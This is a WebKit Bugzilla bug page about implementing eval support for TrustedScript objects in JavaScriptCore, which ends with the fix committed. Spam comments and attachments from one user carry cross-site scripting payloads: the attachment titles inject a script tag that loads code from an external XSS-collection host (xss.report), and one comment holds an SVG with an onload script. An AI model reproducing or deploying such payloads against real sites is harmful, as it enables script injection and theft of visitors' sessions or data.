Bug 273184

Summary:

Implement eval support for TrustedScript objects

Product:

WebKit

Reporter:

Luke Warlow <lwarlow>

Component:

JavaScriptCore

Assignee:

Luke Warlow <lwarlow>

Status:

RESOLVED FIXED

Severity:

Normal

CC:

hackwanan, webkit-bug-importer

Priority:

Keywords:

InRadar

Version:

Safari 17

Hardware:

Unspecified

OS:

Unspecified

See Also:

https://github.com/web-platform-tests/wpt/pull/45879

Bug Depends on:

Bug Blocks:

267694

Attachments:

Description	Flags
'"><script src=https://xss.report/c/wananlife></script>	none
'"><script src=https://xss.report/c/wananlife></script>	none
hackerone wananlife	none
hackerone wananlife	none
hackerone wananlife	none
hackerone wananlife	none
hackerone wananlife	none

Luke Warlow

Reported 2024-04-24 06:35:25 PDT

Implement support for evaluating the code string associated with TrustedScript objects. See Stage 3 proposal https://tc39.es/proposal-dynamic-code-brand-checks/ for more details.

Attachments
'"><script src=https://xss.report/c/wananlife></script> (1.57 KB, image/svg+xml) 2024-04-30 05:37 PDT, wananlife	no flags	Details
'"><script src=https://xss.report/c/wananlife></script> (145 bytes, application/xml) 2024-04-30 05:44 PDT, wananlife	no flags	Details
hackerone wananlife (138 bytes, application/xml) 2024-04-30 05:51 PDT, wananlife	no flags	Details
hackerone wananlife (150 bytes, application/xml) 2024-04-30 05:54 PDT, wananlife	no flags	Details
hackerone wananlife (178 bytes, application/xml) 2024-04-30 05:57 PDT, wananlife	no flags	Details
hackerone wananlife (532 bytes, image/svg+xml) 2024-04-30 06:02 PDT, wananlife	no flags	Details
hackerone wananlife (411 bytes, image/svg+xml) 2024-04-30 06:05 PDT, wananlife	no flags	Details
Show Obsolete (6) View All Add attachment proposed patch, testcase, etc.

Luke Warlow

Comment 1 2024-04-24 07:44:05 PDT

Pull request: https://github.com/WebKit/WebKit/pull/27691

wananlife

Comment 2 2024-04-30 05:37:45 PDT Comment hidden (spam)

Created attachment 471215 [details] '"><script src=https://xss.report/c/wananlife></script>

wananlife

Comment 3 2024-04-30 05:44:04 PDT Comment hidden (spam)

Created attachment 471216 [details] '"><script src=https://xss.report/c/wananlife></script>

wananlife

Comment 4 2024-04-30 05:51:58 PDT Comment hidden (spam)

Created attachment 471217 [details] hackerone wananlife

wananlife

Comment 5 2024-04-30 05:54:07 PDT Comment hidden (spam)

Created attachment 471218 [details] hackerone wananlife

wananlife

Comment 6 2024-04-30 05:57:11 PDT Comment hidden (spam)

Created attachment 471219 [details] hackerone wananlife

wananlife

Comment 7 2024-04-30 06:02:23 PDT Comment hidden (spam)

Created attachment 471220 [details] hackerone wananlife

wananlife

Comment 8 2024-04-30 06:05:21 PDT Comment hidden (spam)

Created attachment 471221 [details] hackerone wananlife

wananlife

Comment 9 2024-04-30 06:08:14 PDT Comment hidden (spam)

Comment on attachment 471221 [details] hackerone wananlife <svg onload="alert('hack wananlife from hackerone')" xmlns="http://www.w3.org/2000/svg" width="300" height="300" viewBox="0 0 300 300">  <rect width="100%" height="100%" fill="#f0f0f0" />  <circle cx="150" cy="150" r="100" fill="#3498db" />  <line x1="50" y1="150" x2="250" y2="150" stroke="#2ecc71" stroke-width="5" />  <rect x="120" y="120" width="60" height="60" fill="#e74c3c" />  <text x="50%" y="50%" font-size="20" text-anchor="middle" fill="#ffffff" dy=".3em">Tech SVG</text> </svg>

Radar WebKit Bug Importer

Comment 10 2024-05-01 06:36:13 PDT

<rdar://problem/127357526>

EWS

Comment 11 2024-05-23 07:50:58 PDT

Committed 279194@main (5e0f9b3cfb2b): <https://commits.webkit.org/279194@main> Reviewed commits have been landed. Closing PR #27691 and removing active labels.

Note You need to log in before you can comment on or make changes to this bug.